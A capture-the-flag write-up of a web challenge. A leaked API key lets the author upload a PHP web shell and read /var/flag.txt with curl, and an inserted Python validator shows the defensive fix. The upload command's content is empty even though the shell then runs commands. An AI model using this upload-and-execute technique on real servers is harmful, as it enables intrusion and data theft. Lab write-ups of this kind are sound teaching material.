Smart Bike (Smart City, 250p)

After making it to the council you speak with the local IT administrators.
They are impressed with your skills and want your help in a security audit.
An exposed API endpoint could be exposing some sensitive information on the city's new Smart Bike infrastructure.
Can you take a look and see if there are any security issues that can be fixed?
Find a way to abuse the functionality of an exposed API endpoint and retrieve the flag from /var/flag.txt
The only thing we know is the exposed IP address (http://envXXX.target03:8000/).

Solution

The website contains simple text and nothing more.

SmartBike API

Checking /robots.txt reveals a hidden config file.

User-Agent: *
Disallow: /js/config.js

Checking /js/config.js reveals the application source.

<script>
    /* Smart Bike API conf, only POST method allowed! */  

    //key
    config.apiKey= "37e4950e-d638-4e9f-9fe1-56baac1b85f2";
    
    //endpoint 
    const api = "/api";
    
    //default upl path
    const path = "/upl";

    //method list
    require([
    	//create -> filename + content  
     	"config/create", 
	//delete -> location + filename (not working, permissions must be fixed)
     	"config/delete",
	//update -> location + filename + content (not working, permissions must be fixed)
     	"config/update" 
    ]);
    
    //responses
    const successCreate   = "Success on file upload!";
    const successDelete   = "Success on file delete!";
    const successUpdate   = "Success on file update!";
    const missingMethod   = "Method is missing or disabled!";
    const missingParameters = "Missing parameter(s)!";
    const error		  = "Unknown error!"; //must be updated with status codes
    const apiKey	  = "Provide apiKey!";
</script>

There is an API key and a few API methods. Basically, the API works as an upload function which stores files in the /upl directory.

As the server is running PHP (revealed by the HTTP headers), the idea is to upload a malicious PHP file and exploit it.
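The fix the council asked for is on the API side: the `create` method writes whatever `filename` it is given straight into the web-served /upl directory. The following is an added reference check (in Python, not the challenge's PHP handler, and not part of the original writeup) showing what a patched `create` should verify before writing anything; the allowlist, upload directory and name pattern are assumptions for the example.

```python
import os
import re

# Constructed defaults for the example: the writeup shows uploads landing
# in /upl, served by the same PHP web server that runs the API.
UPLOAD_DIR = "/upl"
ALLOWED_EXTENSIONS = {".txt", ".json", ".csv"}  # data files only (assumption)
SERVER_EXECUTABLE = {".php", ".phtml", ".phar", ".php3", ".php5", ".php7", ".phps"}
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
PHP_OPEN_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)


def validate_create(filename: str, content: str) -> tuple[bool, str]:
    """Return (accepted, reason_or_target_path) for a `create` call.

    Rejects what the unpatched endpoint wrote verbatim: path separators and
    traversal, server-executable extensions anywhere in the name, extensions
    outside the data-only allowlist, and PHP code inside a data file.
    """
    # The stored name must be a single path component, never a path.
    if os.path.basename(filename) != filename or filename in ("", ".", ".."):
        return False, "filename must be a single path component"
    if not SAFE_NAME.fullmatch(filename):
        return False, "filename contains disallowed characters"
    # Check every suffix so names like 'x.php.txt' are caught as well.
    suffixes = {"." + part.lower() for part in filename.split(".")[1:]}
    if suffixes & SERVER_EXECUTABLE:
        return False, "server-executable extension"
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} not allowed"
    if PHP_OPEN_TAG.search(content):
        return False, "content contains a PHP open tag"
    return True, os.path.join(UPLOAD_DIR, filename)
```

Even with this check in place, the upload directory should be served with PHP execution disabled (or kept outside the web root entirely), so that the defence does not rest on the allowlist alone.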

Trying the API and supplying the necessary parameters by trial and error.

# curl 'http://envXXX.target03:8000/api/?apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2' -d ''
Provide apiKey!
# curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2'
Method is missing or disabled!
# curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2&method=create'
Missing parameter(s)!
Check for configuration...

Upload pwn.php via the API.

# curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2&method=create&filename=pwn.php&content='
Success on file write!

Retrieving the flag.

# curl 'http://envXXX.target03:8000/upl/pwn.php' -d '1=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# curl 'http://envXXX.target03:8000/upl/pwn.php' -d '1=cat /var/flag.txt'
Flag: ctf-tech{757422a2-67e2}

Flag is ctf-tech{757422a2-67e2}.
